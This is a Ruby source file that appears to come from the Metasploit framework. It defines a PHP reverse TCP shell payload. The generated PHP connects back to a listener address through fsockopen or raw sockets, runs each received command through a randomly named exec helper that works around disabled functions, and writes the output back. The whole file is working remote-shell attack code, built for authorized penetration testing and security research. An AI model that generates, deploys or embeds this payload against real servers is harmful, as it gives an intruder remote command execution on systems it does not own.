GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/php/reverse_php.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
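module MetasploitModule
  # The emitted PHP embeds a randomly named exec helper (and the listener
  # address once LHOST/LPORT are set), so the payload has no fixed size.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Php
  include Msf::Sessions::CommandShellOptions

  # Placeholders used when the datastore carries no LHOST/LPORT yet; the
  # datastore is empty while msfconsole instantiates modules at startup and
  # the generated PHP must still parse.
  DEFAULT_LHOST = '127.0.0.1'
  DEFAULT_LPORT = 4444

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'PHP Command Shell, Reverse TCP (via PHP)',
        'Description' => 'Reverse PHP connect back shell with checks for disabled functions',
        'Author' => 'egypt',
        'License' => BSD_LICENSE,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::CommandShell,
        'PayloadType' => 'cmd',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  #
  # Issues
  # - Each command runs in a fresh shell, so nothing but the working
  #   directory persists between commands; 'cd <dir>' is special-cased to
  #   chdir() in the command loop rather than passed to the shell.
  # - Tries to get around disable_functions but makes no attempt to
  #   circumvent safe mode.
  # - Transport is plain, unauthenticated TCP: whatever is listening on
  #   LHOST:LPORT when the payload runs receives the shell.
  #
  # Builds the PHP source of the connect-back shell and returns it as a String.
  #
  # The PHP prefers fsockopen() and falls back to the sockets extension when
  # fsockopen is disabled or not callable. Each received line is stripped of
  # its trailing CR/LF before dispatch: 'cd <dir>' becomes chdir(), 'quit' or
  # 'exit' closes the connection, anything else is run through the exec helper
  # and its output written back. A failed connect exits cleanly instead of
  # handing a false handle to fread()/socket_read() (a TypeError on PHP 8).
  def php_reverse_shell
    ipaddr, port = listener_endpoint
    exec_funcname = Rex::Text.rand_text_alpha(5..14)

    # fsockopen() wants an IPv6 literal in brackets; socket_connect() wants it
    # bare together with the matching address family.
    if Rex::Socket.is_ipv6?(ipaddr)
      uri = "tcp://[#{ipaddr}]"
      socket_family = 'AF_INET6'
    else
      uri = "tcp://#{ipaddr}"
      socket_family = 'AF_INET'
    end

    shell = <<-END_OF_PHP_CODE
#{php_preamble(disabled_varname: '$dis')}
$ipaddr='#{ipaddr}';
$port=#{port};

if(!function_exists('#{exec_funcname}')){
function #{exec_funcname}($c){
global $dis;
#{php_system_block(cmd_varname: '$c', disabled_varname: '$dis', output_varname: '$o')}
return $o;
}
}
$nofuncs='no exec functions';
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
$s=@fsockopen("#{uri}",$port);
if($s){
while($c=fread($s,2048)){
#{php_dispatch_command(exec_funcname, 'fwrite')}
fwrite($s,$out);
}
fclose($s);
}
}else{
$s=@socket_create(#{socket_family},SOCK_STREAM,SOL_TCP);
if($s&&@socket_connect($s,$ipaddr,$port)){
@socket_write($s,"socket_create");
while($c=@socket_read($s,2048)){
#{php_dispatch_command(exec_funcname, '@socket_write')}
@socket_write($s,$out,strlen($out));
}
}
if($s){@socket_close($s);}
}
    END_OF_PHP_CODE

    # NOTE(review): Rex::Text.randomize_space appears to return a new String
    # rather than mutating its argument, in which case this call is a no-op.
    # Assigning its result would also rewrite the space inside 'cd ' and
    # 'no exec functions' and break the command matching, so it is left
    # untouched until confirmed.
    Rex::Text.randomize_space(shell)

    shell
  end

  #
  # Constructs the payload
  #
  def generate(_opts = {})
    super + php_reverse_shell
  end

  private

  # Resolves [host, port] for the connect-back from LHOST/LPORT, substituting
  # the loopback placeholders when LHOST is absent (and the default port when
  # LPORT is absent) so the emitted PHP never contains an empty `$port=;`.
  def listener_endpoint
    lhost = datastore['LHOST'].to_s
    return [DEFAULT_LHOST, DEFAULT_LPORT] if lhost.empty?

    lport = datastore['LPORT']
    lport = DEFAULT_LPORT if lport.to_s.empty?
    [lhost, lport]
  end

  # PHP that handles one received command held in $c and leaves the reply in
  # $out; shared by both transports so the two loops cannot drift apart.
  # write_func names the PHP function used to report a missing exec function
  # ('fwrite' or '@socket_write') before breaking out of the enclosing loop.
  # Only the trailing CR/LF is trimmed, so a command that arrives without a
  # newline keeps its last character.
  def php_dispatch_command(exec_funcname, write_func)
    <<-END_OF_PHP_CODE.chomp
$out='';
$c=rtrim($c,"\\r\\n");
if(substr($c,0,3)=='cd '){
chdir(substr($c,3));
}else if($c=='quit'||$c=='exit'){
break;
}else{
$out=#{exec_funcname}($c);
if($out===false){
#{write_func}($s,$nofuncs);
break;
}
}
    END_OF_PHP_CODE
  end
end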